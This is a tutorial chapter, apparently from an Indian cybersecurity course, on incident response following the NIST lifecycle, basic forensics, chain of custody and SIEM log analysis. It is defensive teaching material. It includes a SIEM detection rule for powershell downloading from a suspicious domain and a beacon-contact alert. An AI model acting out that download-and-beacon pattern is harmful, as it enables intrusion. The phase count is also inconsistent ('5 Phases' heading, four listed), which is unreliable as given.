Chapter 12: Incident Response & Forensics

Incident Response & Forensics.

Pull up a chair—this is one of the most practical and high-stakes chapters in the entire tutorial. In January 2026 (right here in Airoli at around 4 PM IST, maybe with some evening traffic noise outside), incident response (IR) and digital forensics are not “nice-to-have” skills anymore—they are survival skills for organizations and increasingly for individuals in India.

Why?

• CERT-In reported handling over 1.6 million cybersecurity incidents in 2025 alone (that’s ~4,400 per day on average).
• Ransomware groups still hit Indian hospitals, manufacturing plants, and fintech startups weekly.
• Under the DPDP Act 2023 (rules fully enforced since late 2025), organizations must detect, respond to, and report personal data breaches within tight timelines (often 72 hours or less), or face fines up to ₹250 crore.
• Many companies in Navi Mumbai / Mumbai / Pune now have mandatory IR playbooks and tabletop exercises every quarter.

Today we’ll walk through the gold-standard framework most Indian CERTs, MSSPs, and large enterprises follow: the NIST SP 800-61r2 Incident Response Lifecycle (still the most widely adopted in 2026, with minor updates in NIST SP 800-61r3 draft floating around).

We’ll cover each phase in detail, then move to basic forensics, chain of custody, logs, and SIEM.

NIST Incident Response Lifecycle (5 Phases)

NIST organizes IR into five phases that loop continuously:

1. Preparation
2. Detection & Analysis
3. Containment, Eradication & Recovery (often split in practice)
4. Post-Incident Activity (lessons learned – I’ll include it at the end)

Phase 1: Preparation (The Most Important Phase – Do It Before You Need It)

Goal: Build capability so you’re not starting from zero when the alert fires.

Key activities (2026 India context):

• IR Plan / Playbook — Written document (not just a PDF gathering dust). Includes roles (Incident Coordinator, Technical Lead, Legal/Compliance, PR), escalation matrix, communication templates, evidence handling rules.
• Team — CSIRT / SOC team (even if part-time), external retainers (e.g., Deloitte, EY, Kroll, or Indian firms like Lucideus/Quick Heal).
• Tools & Infrastructure —
  • Centralized logging (SIEM – Splunk, Elastic, Microsoft Sentinel, QRadar).
  • EDR/XDR (CrowdStrike, SentinelOne, Microsoft Defender for Endpoint, Seqrite).
  • Forensic workstations (isolated, write-blockers, FTK/EncCase/Autopsy).
  • Backup & recovery tested (immutable/offline backups).
• Training & Testing — Tabletop exercises, red-team simulations, phishing drills.
• Legal/Regulatory Prep — DPDP breach notification templates, CERT-In Form I template ready.

Real example (Airoli SME): A small fintech has an IR playbook: “If ransomware detected → isolate affected VLAN via NGFW → notify CERT-In within 6 hours → engage external IR firm within 24 hours.”

Phase 2: Detection & Analysis

Goal: Find incidents early and understand scope/impact quickly.

Sources of detection (2026 common in India):

• EDR alerts (process injection, encryption spike).
• SIEM rules (brute-force login, anomalous outbound traffic to known C2).
• User reports (“My files have .akira extension”).
• External notification (CERT-In threat intel, dark-web mention).

Analysis steps:

1. Triage: Is this real? Priority? (High = active ransomware, data exfil).
2. Scope: Affected systems? Data? Users?
3. Indicators: IOCs (IP, hash, file path, registry keys).
4. Timeline: When did it start? (log correlation).

Example: SOC sees Defender alert → “rundll32.exe contacting 185.XX.XX.XX:443”. Analyst pulls logs → sees initial phishing email → credential theft → lateral movement via RDP → ransomware drop. Classifies as High severity ransomware incident.

Phase 3: Containment

Goal: Stop the bleeding – prevent further damage.

Two types:

• Short-term containment (immediate): Isolate, kill processes, block C2 IPs/domains, disable compromised accounts.
• Long-term containment (cleaner fix): Re-image systems, change all passwords, patch vulns.

Example actions (ransomware case):

• Network: Block malicious IPs on firewall, isolate VLAN/subnet.
• Endpoint: Quarantine via EDR, kill malicious processes.
• Identity: Disable user accounts, force password reset + MFA re-enroll.
• Backup: Verify offline backups are clean.

India tip: Many orgs now have “ransomware kill-switch” – one button to isolate entire segment via NGFW/SD-WAN.

Phase 4: Eradication

Goal: Remove the root cause and all traces of the attacker.

Steps:

• Identify persistence mechanisms (scheduled tasks, registry run keys, WMI subscriptions, backdoors).
• Wipe & rebuild affected systems (from trusted images).
• Remove malware artifacts (use tools like Autoruns, Process Hacker).
• Patch exploited vulnerabilities (e.g., RDP vuln, unpatched Exchange).
• Rotate all credentials (especially privileged ones via PAM).

Example: Found scheduled task dropping payload every hour → delete task, re-image server, patch Log4Shell vuln that was entry point.

Phase 5: Recovery

Goal: Return to normal operations safely.

Steps:

• Restore from clean backups (test first!).
• Monitor closely for re-infection (increased logging, EDR tuning).
• Communicate with stakeholders (customers, regulators).
• Gradually bring systems online (phased rollout).

Example: Restore HR database from offline backup taken 2 days before attack → verify integrity → bring HR portal back online with extra monitoring for 30 days.

Post-Incident Activity (Lessons Learned)

• Root cause analysis (RCA).
• After-action report (what went well / gaps).
• Update IR plan, tools, training.
• Share IOCs with CERT-In / industry groups (anonymously if needed).

Basic Digital Forensics (Evidence Collection, Chain of Custody)

Digital Forensics = Science of preserving, identifying, extracting, and documenting digital evidence for court / internal use.

Core principles:

• Preservation — Never work on original evidence (use forensic images).
• Chain of Custody — Document every person who handled evidence, when, why (form with signatures, timestamps). Critical for admissibility in Indian courts (IT Act, Evidence Act).
• Write-blockers — Hardware/software that prevents writes to source drive.

Basic collection steps (2026 toolkit):

1. Volatile data first (RAM, running processes) – use Magnet RAM Capture, DumpIt, FTK Imager Lite.
2. Create forensic image of disk (dd, FTK Imager, EnCase, Guymager).
3. Hash verification (MD5/SHA-256 of image matches source).
4. Timeline analysis (Autopsy, Plaso, Timesketch).
5. File carving (recover deleted files – foremost, scalpel).

Example (Indian court case style): Ransomware hits company → IR team powers off affected server → uses write-blocker + FTK Imager to create .E01 image → documents chain of custody form → hands over to external forensics firm for court evidence.

Log Analysis and SIEM Introduction

Logs = The truth serum of incidents.

Key log sources (2026):

• Windows Event Logs (Security, System, Application).
• Sysmon (advanced process/network logging).
• Endpoint (EDR telemetry).
• Network (firewall, DNS, proxy, IDS/IPS).
• Cloud (Azure AD sign-ins, AWS CloudTrail).
• Application (web server, database audit logs).

SIEM (Security Information & Event Management) — Central platform that collects, normalizes, correlates, alerts, and reports on logs.

Popular in India 2026:

• Microsoft Sentinel (cloud, affordable for many).
• Elastic (ELK) Stack (open-source, very common in startups).
• Splunk (enterprise gold standard).
• QRadar, Sumo Logic, Seqrite, ManageEngine.

Example workflow: SIEM rule: “Multiple failed logins from same IP followed by successful login + process creation of powershell.exe downloading from suspicious domain” → alerts SOC → analyst correlates with Sysmon logs → confirms credential theft + Cobalt Strike beacon → escalates to IR.

That’s Chapter 12 in full detail—real-world, actionable, India-relevant.